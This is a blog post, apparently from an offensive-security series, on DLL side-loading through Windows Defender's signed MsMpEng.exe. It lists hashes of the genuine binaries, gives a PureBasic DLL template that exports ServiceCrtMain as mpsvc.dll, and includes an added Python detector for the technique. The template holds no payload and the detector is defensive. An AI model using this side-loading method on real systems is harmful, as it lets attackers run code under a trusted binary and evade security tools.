TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

My all-time favorite side-loading target is Windows Defender, as most of the time the executable (MsMpEng.exe) is already on the system and you only need to place your DLL, with one export (ServiceCrtMain), in the right folder and copy the executable.

  • Name: Microsoft Windows Defender (x64)
  • Executable: MsMpEng.exe
  • SHA256: a72ea60be2adb8f15bbec86910dc1c1f41abe888fb87b1f3f902dcaa85e774f6
  • SHA1: fdb29638944a097d83c8c3442970287a890a0a03
  • MD5: ed70edcc4107f3727973c312e0049bd5
  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority

  • Name: Microsoft Windows Defender (x32)
  • Executable: MsMpEng.exe
  • SHA256: 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • SHA1: 3d409b39b8502fcd23335a878f2cbdaf6d721995
  • MD5: 8cc83221870dd07144e63df594c391d9
  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority
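
The pattern above (a genuine, Microsoft-signed MsMpEng.exe copied somewhere else, loading an mpsvc.dll that exports ServiceCrtMain) is easy to miss if you only allow-list the executable, because the EXE is the real thing. The following Python check is an added example, not part of the original post or its DLL template. It consumes records shaped like the fields of a Sysmon Event ID 7 (ImageLoad) entry (Image, ImageLoaded, Signed, Signature) plus a constructed image_sha256 field for the process binary, and flags MsMpEng.exe running outside the Defender directories or loading an mpsvc.dll that is not Microsoft-signed. The EXPECTED_PREFIXES directories and the sample events, including their paths and version folder, are assumptions I made for the example; the SHA256 values are the two listed above.

```python
"""Flag a copied MsMpEng.exe side-loading an untrusted mpsvc.dll.

Added example (not from the original post). Input records mimic the fields of
a Sysmon Event ID 7 (ImageLoad): Image, ImageLoaded, Signed, Signature. The
image_sha256 field is a constructed addition so the check can confirm that the
process binary is one of the genuine Defender builds listed in the post.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# SHA256 values listed in the post for the x64 and x32 MsMpEng.exe builds.
KNOWN_MSMPENG_SHA256 = {
    "a72ea60be2adb8f15bbec86910dc1c1f41abe888fb87b1f3f902dcaa85e774f6",
    "33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a",
}

# Assumption: directories under which Windows Defender legitimately runs its
# service binary. Tune these prefixes to the installs in your estate.
EXPECTED_PREFIXES = (
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\platform\\",
)


@dataclass(frozen=True)
class ImageLoad:
    image: str              # full path of the process executable
    image_loaded: str       # full path of the DLL being loaded
    signed: bool            # whether the DLL carried a valid Authenticode signature
    signature: str          # signer subject, empty when unsigned
    image_sha256: str = ""  # constructed: SHA256 of the process executable


def _norm(path: str) -> str:
    """Normalise a Windows path for comparison (backslashes, lower case)."""
    return path.replace("/", "\\").lower()


def is_expected_location(image_path: str) -> bool:
    """True when the binary runs from one of the known Defender directories."""
    p = _norm(image_path)
    return any(p.startswith(prefix) for prefix in EXPECTED_PREFIXES)


def assess(ev: ImageLoad) -> list[str]:
    """Return the reasons an ImageLoad looks like the side-load; [] if clean."""
    if ntpath.basename(_norm(ev.image)) != "msmpeng.exe":
        return []
    if ntpath.basename(_norm(ev.image_loaded)) != "mpsvc.dll":
        return []

    reasons: list[str] = []
    if not is_expected_location(ev.image):
        reasons.append(f"MsMpEng.exe running outside Defender directories: {ev.image}")
    if not ev.signed or "microsoft" not in ev.signature.lower():
        reasons.append(f"mpsvc.dll is not Microsoft-signed (signer={ev.signature!r})")
    if reasons and ev.image_sha256.lower() in KNOWN_MSMPENG_SHA256:
        # The executable itself is the genuine signed binary, so a hash or
        # signer allow-list on the EXE alone cannot catch this; the DLL and
        # the location are what give it away.
        reasons.append("process image hash matches a genuine Defender build")
    return reasons


def triage(events: list[ImageLoad]) -> list[tuple[ImageLoad, list[str]]]:
    """Run assess() over a batch and keep only the events with findings."""
    return [(ev, r) for ev in events if (r := assess(ev))]


# Constructed sample events; the paths and the Platform version folder are
# placeholders, not values from a real host.
SAMPLE_EVENTS = [
    ImageLoad(
        image=r"C:\ProgramData\Microsoft\Windows Defender\Platform\0.0.0.0-0\MsMpEng.exe",
        image_loaded=r"C:\ProgramData\Microsoft\Windows Defender\Platform\0.0.0.0-0\mpsvc.dll",
        signed=True,
        signature="Microsoft Windows",
        image_sha256="a72ea60be2adb8f15bbec86910dc1c1f41abe888fb87b1f3f902dcaa85e774f6",
    ),
    ImageLoad(
        image=r"C:\Users\Public\Update\MsMpEng.exe",
        image_loaded=r"C:\Users\Public\Update\mpsvc.dll",
        signed=False,
        signature="",
        image_sha256="a72ea60be2adb8f15bbec86910dc1c1f41abe888fb87b1f3f902dcaa85e774f6",
    ),
    ImageLoad(
        image=r"C:\Windows\System32\notepad.exe",
        image_loaded=r"C:\Windows\System32\kernel32.dll",
        signed=True,
        signature="Microsoft Windows",
    ),
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev.image)
        for reason in reasons:
            print("  -", reason)
```

Only the second sample event produces findings: the first is a Defender install loading its own signed mpsvc.dll, the third is unrelated. The hash check is deliberately a secondary signal that is only reported alongside another reason, since a matching hash on its own is exactly what a legitimate install looks like.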

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie (marpie@a12d404.net)                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190104                                                   *
; * Last Update: 20190104                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: mpsvc.dll - MsMpEng.exe (Microsoft Malware Protection Antimalware Service Executable)

DummyExport(ServiceCrtMain)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on GitHub: signed-loaders